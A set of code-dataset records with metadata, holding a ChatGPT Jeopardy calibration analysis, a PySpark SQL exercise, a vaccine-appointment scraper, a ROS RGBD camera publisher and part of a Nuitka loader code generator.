"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 286,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 288,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 291,
"usage_type": "call"
},
{
"api_name": "url_normalize.url_normalize",
"line_number": 293,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 300,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 301,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 302,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 304,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 305,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 313,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 314,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 315,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 318,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 322,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 326,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 328,
"usage_type": "call"
}
] |
40814128
|
"""
Plot the results.
"""
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import datasets
# Set a nice seaborn style for matplotlib
sns.set_theme()
#%%
# Load results from csv
df = pd.read_csv("jeopardy_results.csv", index_col="idx")
#%%
# Load the dataset from the Hugging Face Hub
dataset = datasets.load_dataset("jeopardy", split="train")
# Turn dataset into a dataframe
dataset = pd.DataFrame(dataset)
# Rename the category column to avoid conflicts
dataset.rename(columns={"category": "category_dataset", "question": "question_dataset"}, inplace=True)
#%%
# Join the dataset with the results (we don't have results for all rows)
full_df = df.join(dataset, how="inner")
# Verify that category_dataset and category are the same
assert (full_df["category_dataset"] == full_df["category"]).all()
# Verify that question_dataset and question are the same
assert (full_df["question_dataset"] == full_df["question"]).all()
# Delete category_dataset and question_dataset
del full_df["category_dataset"]
del full_df["question_dataset"]
#%%
# We have one nan
# The log message is: Expected confidence between 0 and 1, got content='I apologize, but I cannot provide a specific numerical value of my confidence level, as I am an artificial intelligence language model, and I do not have personal feelings or emotions. However, based on my knowledge and analysis of the available information, I am confident that my answer (South Africa) is correct.' additional_kwargs={}
# Check that that is the case
#assert len(full_df[full_df["confidence"].isna()]) == 1
#assert full_df[full_df["confidence"].isna()].iloc[0]["answer"] == "South Africa"
# Set the confidence to 1.
#full_df["confidence"].fillna(1, inplace=True)
# Drop rows with na in confidence
full_df.dropna(subset=["confidence"], inplace=True)
#%%
# Plot the distribution of confidence
sns.histplot(data=full_df, x="confidence", bins=20)
# Save as svg
plt.savefig("confidence_distribution.svg", format="svg", bbox_inches="tight", pad_inches=0, transparent=False)
plt.show()
#%%
# Plot a calibration plot using sklearn
from sklearn.calibration import CalibrationDisplay
# Get the calibration display
cal_display = CalibrationDisplay.from_predictions(
y_true=full_df["accuracy"], y_prob=full_df["confidence"], n_bins=5, name="ChatGPT",
strategy="uniform"
)
# Plot the calibration curve
cal_display.plot()
plt.savefig("chatgpt_calibration.svg", format="svg", bbox_inches="tight", pad_inches=0, transparent=False)
plt.show()
#%%
# Plot the AUROC curve with RocCurveDisplay
from sklearn.metrics import RocCurveDisplay
roc_display = RocCurveDisplay.from_predictions(
y_true=full_df["accuracy"], y_pred=full_df["confidence"], name="ChatGPT")
# Plot the ROC curve
roc_display.plot()
plt.show()
#%% Load the watson_cmp data
import numpy as np
watson_cmp = pd.read_csv("watson_cmp/watson_v0.8_precision_recall.csv")
# Sort the data by recall (ascending)
watson_cmp.sort_values(by="recall", inplace=True)
# Compute the average precision score for watson_cmp (which has recall, precision as columns)
# Use np.sum(np.diff(recall) * np.array(precision)[:-1]) to compute the area under the curve
watson_avg_precision = np.sum(np.diff(watson_cmp["recall"]) * np.array(watson_cmp["precision"])[:-1])
print(f"watson_avg_precision: {watson_avg_precision}")
#%%
# Plot the precision-recall curve with PrecisionRecallDisplay
from sklearn.metrics import PrecisionRecallDisplay
import matplotlib.ticker as mtick
pr_display = PrecisionRecallDisplay.from_predictions(
y_true=full_df["accuracy"], y_pred=full_df["confidence"], name="ChatGPT")
# Plot the precision-recall curve
pr_display.plot()
pr_display_watson = PrecisionRecallDisplay(
precision=watson_cmp["precision"], recall=watson_cmp["recall"],
average_precision=watson_avg_precision,
estimator_name="Watson v0.8"
)
# Plot the precision-recall curve for Watson
pr_display_watson.plot(ax=plt.gca())
# X axis is % Answered
plt.xlabel("% Answered")
# Change the ticks and labels to be percentages (in 10% increments)
plt.xticks([0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],
["0%", "10%", "20%", "30%", "40%", "50%", "60%", "70%", "80%", "90%", "100%"])
# Y axis is Precision
plt.ylabel("Precision")
# Change the labels to be in percentages
plt.gca().yaxis.set_major_formatter(mtick.PercentFormatter(1.0))
plt.savefig("chatgpt_watson_v0.8_precision_recall.svg", format="svg", bbox_inches="tight", pad_inches=0, transparent=False)
plt.show()
#%% Compute a baseline accuracy:
# We check whether the true_answer is literally contained in ChatGPT's answer
# If so, we count it as "obviously" correct
# This is a very naive baseline, but it's a good sanity check
# use apply to apply the function to each row
full_df["baseline_accuracy"] = full_df.apply(
lambda row: int(row["true_answer"].lower() in row["model_answer"].lower()), axis=1)
#%% Compute accuracy by round
# Get the number of correct answers by round
correct_by_round = full_df.groupby(["round"]).agg({"accuracy": "sum", "baseline_accuracy": "sum"})
# Get the total number of answers by round
total_by_round = full_df.groupby(["round"]).agg({"accuracy": "count", "baseline_accuracy": "count"})
# Compute the accuracy by round
accuracy_by_round = correct_by_round / total_by_round
# Render the accuracy by round as markdown table
print(accuracy_by_round.to_markdown())
#%%
# Overall accuracy:
print(f"Overall accuracy: {full_df['accuracy'].mean()}")
print(f"Overall string contains accuracy: {full_df['baseline_accuracy'].mean()}")
#%% Extract the baseline_accuracy == 0 and accuracy == 1 answers in a new df
correct_but_not_obviously_correct = full_df[(full_df["baseline_accuracy"] == 0) & (full_df["accuracy"] == 1)]
# Subselect the question, true_answer, model_answer columns
correct_but_not_obviously_correct = correct_but_not_obviously_correct[["true_answer", "model_answer", "question"]]
# Save to csv
correct_but_not_obviously_correct.to_csv("correct_but_not_obviously_correct.csv", index=True)
#%% Are they baseline_accuracy == 1 and accuracy == 0?
# Extract the baseline_accuracy == 1 and accuracy == 0 answers in a new df
obviously_correct_but_incorrect = full_df[(full_df["baseline_accuracy"] == 1) & (full_df["accuracy"] == 0)]
# Subselect the question, true_answer, model_answer columns
obviously_correct_but_incorrect = obviously_correct_but_incorrect[["true_answer", "model_answer", "question"]]
# Save to CSV as potential false negatives
obviously_correct_but_incorrect.to_csv("potential_false_negatives.csv", index=True)
|
BlackHC/player_of_jeopardy
|
analysis.py
|
analysis.py
|
py
| 6,596 |
python
|
en
|
code
| 10 |
github-code
|
6
|
[
{
"api_name": "seaborn.set_theme",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "datasets.load_dataset",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "seaborn.histplot",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.savefig",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 61,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 62,
"usage_type": "name"
},
{
"api_name": "sklearn.calibration.CalibrationDisplay.from_predictions",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "sklearn.calibration.CalibrationDisplay",
"line_number": 70,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.savefig",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 76,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 77,
"usage_type": "name"
},
{
"api_name": "sklearn.metrics.RocCurveDisplay.from_predictions",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.RocCurveDisplay",
"line_number": 85,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 89,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 94,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "numpy.diff",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.PrecisionRecallDisplay.from_predictions",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.PrecisionRecallDisplay",
"line_number": 110,
"usage_type": "name"
},
{
"api_name": "sklearn.metrics.PrecisionRecallDisplay",
"line_number": 115,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.gca",
"line_number": 121,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 121,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 124,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 124,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xticks",
"line_number": 126,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 126,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 130,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 130,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.gca",
"line_number": 132,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 132,
"usage_type": "name"
},
{
"api_name": "matplotlib.ticker.PercentFormatter",
"line_number": 132,
"usage_type": "call"
},
{
"api_name": "matplotlib.ticker",
"line_number": 132,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.savefig",
"line_number": 134,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 134,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 135,
"usage_type": "name"
}
] |
73008025149
|
# Lesson 26 my code
from pyspark.sql import SparkSession #import spark sql with session and row
from pyspark.sql import Row #both of these thigns we use to itneract with SparkSQL and dataFrames
spark = SparkSession.builder.appName("SparkSQL").getOrCreate() #the get or create again, creating a new spark session or connect to one from a previous one
def mapper(line):
fields = line.split(',')
return Row(ID = int(fields[0]), #going in order to create the rows. First field or 0th element is ID, etc.
name = str(fields[1].encode("utf-8")), \
age = int(fields[2]),
numFriends = int(fields[3]))
lines = spark.sparkContext.textFile("../CSV/fakefriends.csv") #note that this csv does NOT ahve headers so it may make it difficult to structure the data. We still have SparkCOntext availabel under spark session. Creates RDD named lines.
# Also quick note, original code said textFile("fakefriends.csv") this still has the path problem so I had to update it to go to the director with the csv files
people = lines.map(mapper) #map every row from the incoming lines. Need rows first before creating a DataFrame.
schemaPeople = spark.createDataFrame(people).cache() #we first infer the schema. Passing in people RDD and converting into dataframe. Keep this in memory thats why we cache it
schemaPeople.createOrReplaceTempView("people") #register the DataFrame as a table. Existing view then it would be replaced. Can use this like a database table
teenagers = spark.sql("SELECT * FROM people WHERE age >= 13 AND age <= 19")
#SQL can be run over DataFrames that have been registered as a table ^^^. Teenagers is a dataFrame!! Also the names map back to the names we gave them when we constructed the Row object.
for teen in teenagers.collect(): #results of SQL queries are RDDs and supprot all the normal RDD operations
print(teen) #this is a simple collect and print
schemaPeople.groupBy("age").count().orderBy("age").show() #can also use fcns rather than SQL queries. We can do either fcns or SQL commands!
spark.stop() #kinda like opening and closing a database. good practice to close if we do not use. Stop when done.
|
CenzOh/Python_Spark
|
MyCode/sparkSql.py
|
sparkSql.py
|
py
| 2,183 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pyspark.sql.SparkSession.builder.appName",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "pyspark.sql.SparkSession",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "pyspark.sql.Row",
"line_number": 9,
"usage_type": "call"
}
] |
24254182121
|
import time
import requester
import json
import config
location_id_data = {}
exclude_ids = config.settings["loc_ids_to_exclude"] # Gananoque & Tay Valley Old People One & Prescott
def parseLocationsToDict():
# Locations.json is extracted from the bottom of the pomelo covid-vaccination "locations" html page where you select a spot.
# Kinda stupid so I just extracted it and then saved it as a json.
with open("data/locations.json", encoding="utf-8") as data_file:
location_data = json.loads(data_file.read())["locations"]
for location in location_data:
loc_id = location["loc_id"]
location_id_data[loc_id] = location
def locAddyToAddress(data):
address = data["address"].strip()
# address2 = data["address2"].strip()
city = data["city"].strip()
# province = data["province"].strip()
# country = data["country"].strip()
postal = data["postal"].strip()
loc_address = address + ", " + city + ", " + postal
return loc_address
def check_locations(checking_locations, verbose_output):
config.resetLastAvailableDate()
for x in checking_locations:
if x["id"] not in exclude_ids:
loc_id = x["id"]
loc_name = location_id_data[loc_id]["loc_name"].replace(" ", " ")
loc_address = locAddyToAddress(location_id_data[loc_id]["address"])
unavailable = x["hasUnavailableAppointments"]
if verbose_output:
print(f"{loc_id} {loc_name} ({loc_address})")
if unavailable:
print(f"{loc_id} No appointments available.")
print("*" * 50)
if not unavailable:
earliest_date = requester.findEarliestDate(loc_id)
if earliest_date["available"]:
current_loc_data = earliest_date["nextByLocId"][0]
config_epoch = config.settings["earliest_epoch"]
next_epoch = current_loc_data["next_date"]
readable_time = current_loc_data["next"]
if config_epoch == 0 or next_epoch < config_epoch:
# Found new epoch!
value_list = [readable_time, next_epoch, loc_id, loc_name, loc_address]
key_list = ["earliest_date", "earliest_epoch", "earliest_loc_id", "earliest_loc_name",
"earliest_loc_address"]
config.updateKeys(key_list, value_list)
if verbose_output:
print(f"{loc_id} {readable_time}")
print("*" * 50)
def alertAvailableDate():
latest_epoch = config.settings["earliest_epoch"]
alert_epoch = config.settings["alert_epoch"]
last_epoch_alerted = config.settings["last_epoch_alerted"]
date = config.settings["earliest_date"]
loc_name = config.settings["earliest_loc_name"]
loc_address = config.settings["earliest_loc_address"]
if latest_epoch != 0 and last_epoch_alerted != latest_epoch:
if latest_epoch < alert_epoch:
# New Time is before alert epoch! Announce
print("NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME ")
print("NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME ")
print("NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME ")
print(f"{loc_name} ({loc_address})")
print(f"ALERT NEW TIME: {date})")
config.update("last_epoch_alerted", latest_epoch)
else:
# This will output every time a different earliest date is available.
# Remove to only alert before the alert epoch
print(f"{loc_name} ({loc_address})")
print(f"AVAILABLE: {date}")
config.update("last_epoch_alerted", latest_epoch)
if __name__ == "__main__":
print("Pomelo Vaccination Appointment Date Scraper")
print("*" * 50)
parseLocationsToDict()
#requester.getHMSession()
active_locations = requester.getLocations()
check_locations(active_locations, True)
alertAvailableDate()
print("*" * 50)
time.sleep(60)
for i in range(5000):
active_locations = requester.getLocations()
check_locations(active_locations, False)
alertAvailableDate()
print("*" * 50)
time.sleep(60)
|
TASelwyn/PomeloScraper
|
main.py
|
main.py
|
py
| 4,417 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "config.settings",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "json.loads",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "config.resetLastAvailableDate",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "requester.findEarliestDate",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "config.settings",
"line_number": 53,
"usage_type": "attribute"
},
{
"api_name": "config.updateKeys",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "config.settings",
"line_number": 72,
"usage_type": "attribute"
},
{
"api_name": "config.settings",
"line_number": 73,
"usage_type": "attribute"
},
{
"api_name": "config.settings",
"line_number": 74,
"usage_type": "attribute"
},
{
"api_name": "config.settings",
"line_number": 76,
"usage_type": "attribute"
},
{
"api_name": "config.settings",
"line_number": 77,
"usage_type": "attribute"
},
{
"api_name": "config.settings",
"line_number": 78,
"usage_type": "attribute"
},
{
"api_name": "config.update",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "config.update",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "requester.getLocations",
"line_number": 102,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "requester.getLocations",
"line_number": 108,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 112,
"usage_type": "call"
}
] |
73369850107
|
#!/usr/bin/env python3
import rospy
import socket as s
import numpy as np
from cv_bridge import CvBridge
import cv2
import pickle
import struct
import time
# import ROS messages
from sensor_msgs.msg import Image
from sensor_msgs.msg import CameraInfo
from std_msgs.msg import Header
from utils import Msg
import constants
fps_counter = 50
"""
This node receives the RGBD camera stream over tcp from the host machine and publishes it for rtabmap_ros.
"""
def setupSocket():
socket = s.socket(s.AF_INET, s.SOCK_STREAM)
socket.bind((constants.HOST, constants.PORT_CAMERA))
socket.listen()
return socket
def setupCameraInfo():
# information on parameters. http://docs.ros.org/en/melodic/api/sensor_msgs/html/msg/CameraInfo.html
camera_info = CameraInfo()
camera_info.width = constants.FRAME_WIDTH
camera_info.height = constants.FRAME_HEIGHT
camera_info.distortion_model = constants.CAMERA_DISTORTION_MODEL
camera_info.D = constants.CAMERA_D
camera_info.K = constants.CAMERA_K
camera_info.R = list(np.eye(3).reshape(9).astype(np.float32))
camera_info.P = list(np.hstack([np.array(constants.CAMERA_K).reshape((3, 3)), np.zeros((3, 1))]).reshape(12).astype(np.float32))
return camera_info
def decode(msg_bytes):
msg = pickle.loads(msg_bytes)
color = cv2.imdecode(np.frombuffer(msg.color, dtype=np.uint8), cv2.IMREAD_COLOR)
depth = msg.depth
return color, depth
def main():
# initialize node and topics
rospy.init_node('camera_node', anonymous=True)
color_pub = rospy.Publisher('/camera/rgb/image_rect_color', Image, queue_size=1)
depth_pub = rospy.Publisher('/camera/depth_registered/image_raw', Image, queue_size=10)
info_pub = rospy.Publisher('/camera/rgb/camera_info', CameraInfo, queue_size=10)
# create camera_info and CvBridge
camera_info = setupCameraInfo()
bridge = CvBridge()
rospy.loginfo("[Camera publisher] Waiting for streamer connection")
socket = setupSocket()
conn, address = socket.accept()
start_time = time.time()
indx = 0
# publisher loop
while not rospy.is_shutdown():
# Receive the size of the data and then the data itself from the socket connection
data_size = conn.recv(4)
size = struct.unpack('!I', data_size)[0]
data = b''
while len(data) < size and not rospy.is_shutdown():
packet = conn.recv(size - len(data))
if not packet:
break
data += packet
# Convert the byte array to an OpenCV image
color_image, depth_image = decode(data)
# transform to ROS Image messages
color_ros = bridge.cv2_to_imgmsg(color_image, encoding="rgb8")
depth_ros = bridge.cv2_to_imgmsg(depth_image, encoding="mono16")
# set headers
current_time = rospy.get_time()
header = Header(stamp=rospy.Time.from_sec(current_time), frame_id="camera_link")
color_ros.header = header
depth_ros.header = header
camera_info.header = header
# publish
color_pub.publish(color_ros)
depth_pub.publish(depth_ros)
info_pub.publish(camera_info)
if indx % fps_counter == 0:
elapsed_time = time.time() - start_time
fps = fps_counter / (elapsed_time)
# rospy.loginfo(f"FPS: {fps}")
start_time = time.time()
indx += 1
conn.close()
# rospy.loginfo("Streamer disconnected")
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
|
yv1es/MRMapper
|
core/ros_node/mr-mapper/src/camera_publisher.py
|
camera_publisher.py
|
py
| 3,667 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "socket.socket",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "socket.AF_INET",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "socket.SOCK_STREAM",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "socket.bind",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "constants.HOST",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "constants.PORT_CAMERA",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "socket.listen",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "sensor_msgs.msg.CameraInfo",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "constants.FRAME_WIDTH",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "constants.FRAME_HEIGHT",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "constants.CAMERA_DISTORTION_MODEL",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "constants.CAMERA_D",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "constants.CAMERA_K",
"line_number": 42,
"usage_type": "attribute"
},
{
"api_name": "numpy.eye",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "numpy.hstack",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "constants.CAMERA_K",
"line_number": 44,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 44,
"usage_type": "attribute"
},
{
"api_name": "pickle.loads",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "cv2.imdecode",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "numpy.frombuffer",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 51,
"usage_type": "attribute"
},
{
"api_name": "cv2.IMREAD_COLOR",
"line_number": 51,
"usage_type": "attribute"
},
{
"api_name": "rospy.init_node",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "rospy.Publisher",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "sensor_msgs.msg.Image",
"line_number": 59,
"usage_type": "argument"
},
{
"api_name": "rospy.Publisher",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "sensor_msgs.msg.Image",
"line_number": 60,
"usage_type": "argument"
},
{
"api_name": "rospy.Publisher",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "sensor_msgs.msg.CameraInfo",
"line_number": 61,
"usage_type": "argument"
},
{
"api_name": "cv_bridge.CvBridge",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "rospy.loginfo",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "socket.accept",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "rospy.is_shutdown",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "struct.unpack",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "rospy.is_shutdown",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "rospy.get_time",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "std_msgs.msg.Header",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "rospy.Time.from_sec",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "rospy.Time",
"line_number": 98,
"usage_type": "attribute"
},
{
"api_name": "time.time",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 113,
"usage_type": "call"
},
{
"api_name": "rospy.ROSInterruptException",
"line_number": 125,
"usage_type": "attribute"
}
] |
16542834327
|
import sys
from nuitka import Options
from nuitka.ModuleRegistry import (
getDoneModules,
getUncompiledModules,
getUncompiledTechnicalModules,
)
from nuitka.plugins.Plugins import Plugins
from nuitka.PythonVersions import python_version
from nuitka.Tracing import inclusion_logger
from nuitka.utils.CStrings import encodePythonStringToC, encodePythonUnicodeToC
from .Indentation import indented
from .templates.CodeTemplatesLoader import (
template_metapath_loader_body,
template_metapath_loader_bytecode_module_entry,
template_metapath_loader_compiled_module_entry,
template_metapath_loader_extension_module_entry,
)
def getModuleMetaPathLoaderEntryCode(module, bytecode_accessor):
module_c_name = encodePythonStringToC(
Plugins.encodeDataComposerName(module.getFullName().asString())
)
flags = ["NUITKA_TRANSLATED_FLAG"]
if (
not Options.isStandaloneMode()
and not Options.shallMakeModule()
and Options.getFileReferenceMode() == "original"
and python_version >= 0x370
):
# File system paths that will hopefully work, spell-checker: ignore getfilesystemencoding
if Options.isWin32Windows():
file_path = encodePythonUnicodeToC(module.getCompileTimeFilename())
else:
file_path = encodePythonStringToC(
module.getCompileTimeFilename().encode(sys.getfilesystemencoding())
)
else:
file_path = "NULL"
if module.isUncompiledPythonModule():
code_data = module.getByteCode()
is_package = module.isUncompiledPythonPackage()
flags.append("NUITKA_BYTECODE_FLAG")
if is_package:
flags.append("NUITKA_PACKAGE_FLAG")
accessor_code = bytecode_accessor.getBlobDataCode(
data=code_data,
name="bytecode of module '%s'" % module.getFullName(),
)
return template_metapath_loader_bytecode_module_entry % {
"module_name": module_c_name,
"bytecode": accessor_code[accessor_code.find("[") + 1 : -1],
"size": len(code_data),
"flags": " | ".join(flags),
"file_path": file_path,
}
elif module.isPythonExtensionModule():
flags.append("NUITKA_EXTENSION_MODULE_FLAG")
return template_metapath_loader_extension_module_entry % {
"module_name": module_c_name,
"flags": " | ".join(flags),
"file_path": file_path,
}
else:
if module.isCompiledPythonPackage():
flags.append("NUITKA_PACKAGE_FLAG")
return template_metapath_loader_compiled_module_entry % {
"module_name": module_c_name,
"module_identifier": module.getCodeName(),
"flags": " | ".join(flags),
"file_path": file_path,
}
def getMetaPathLoaderBodyCode(bytecode_accessor):
metapath_loader_inittab = []
metapath_module_decls = []
uncompiled_modules = getUncompiledModules()
for other_module in getDoneModules():
# Put those at the end.
if other_module in uncompiled_modules:
continue
metapath_loader_inittab.append(
getModuleMetaPathLoaderEntryCode(
module=other_module, bytecode_accessor=bytecode_accessor
)
)
if other_module.isCompiledPythonModule():
metapath_module_decls.append(
"""\
extern PyObject *modulecode_%(module_identifier)s(\
PyThreadState *tstate, PyObject *, struct Nuitka_MetaPathBasedLoaderEntry const *);"""
% {"module_identifier": other_module.getCodeName()}
)
# Do them now
for uncompiled_module in uncompiled_modules:
metapath_loader_inittab.append(
getModuleMetaPathLoaderEntryCode(
module=uncompiled_module, bytecode_accessor=bytecode_accessor
)
)
frozen_defs = []
# Only the non-technical ones need to be there.
for uncompiled_module in getUncompiledTechnicalModules():
module_name = uncompiled_module.getFullName()
code_data = uncompiled_module.getByteCode()
is_package = uncompiled_module.isUncompiledPythonPackage()
size = len(code_data)
# Packages are indicated with negative size.
if is_package:
size = -size
accessor_code = bytecode_accessor.getBlobDataCode(
data=code_data,
name="bytecode of module '%s'" % uncompiled_module.getFullName(),
)
frozen_defs.append(
"""\
{{"{module_name}", {start}, {size}}},""".format(
module_name=module_name,
start=accessor_code[accessor_code.find("[") + 1 : -1],
size=size,
)
)
if Options.isShowInclusion():
inclusion_logger.info("Embedded as frozen module '%s'." % module_name)
return template_metapath_loader_body % {
"metapath_module_decls": indented(metapath_module_decls, 0),
"metapath_loader_inittab": indented(metapath_loader_inittab),
"bytecode_count": bytecode_accessor.getConstantsCount(),
"frozen_modules": indented(frozen_defs),
}
|
Nuitka/Nuitka
|
nuitka/code_generation/LoaderCodes.py
|
LoaderCodes.py
|
py
| 5,236 |
python
|
en
|
code
| 10,019 |
github-code
|
6
|
[
{
"api_name": "nuitka.utils.CStrings.encodePythonStringToC",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "nuitka.plugins.Plugins.Plugins.encodeDataComposerName",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "nuitka.plugins.Plugins.Plugins",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "nuitka.Options.isStandaloneMode",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "nuitka.Options",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "nuitka.Options.shallMakeModule",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "nuitka.Options",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "nuitka.Options.getFileReferenceMode",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "nuitka.Options",
"line_number": 33,
"usage_type": "name"
},
{
"api_name": "nuitka.PythonVersions.python_version",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "nuitka.Options.isWin32Windows",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "nuitka.Options",
"line_number": 37,
"usage_type": "name"
},
{
"api_name": "nuitka.utils.CStrings.encodePythonUnicodeToC",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "nuitka.utils.CStrings.encodePythonStringToC",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "sys.getfilesystemencoding",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "templates.CodeTemplatesLoader.template_metapath_loader_bytecode_module_entry",
"line_number": 59,
"usage_type": "name"
},
{
"api_name": "templates.CodeTemplatesLoader.template_metapath_loader_extension_module_entry",
"line_number": 69,
"usage_type": "name"
},
{
"api_name": "templates.CodeTemplatesLoader.template_metapath_loader_compiled_module_entry",
"line_number": 78,
"usage_type": "name"
},
{
"api_name": "nuitka.ModuleRegistry.getUncompiledModules",
"line_number": 90,
"usage_type": "call"
},
{
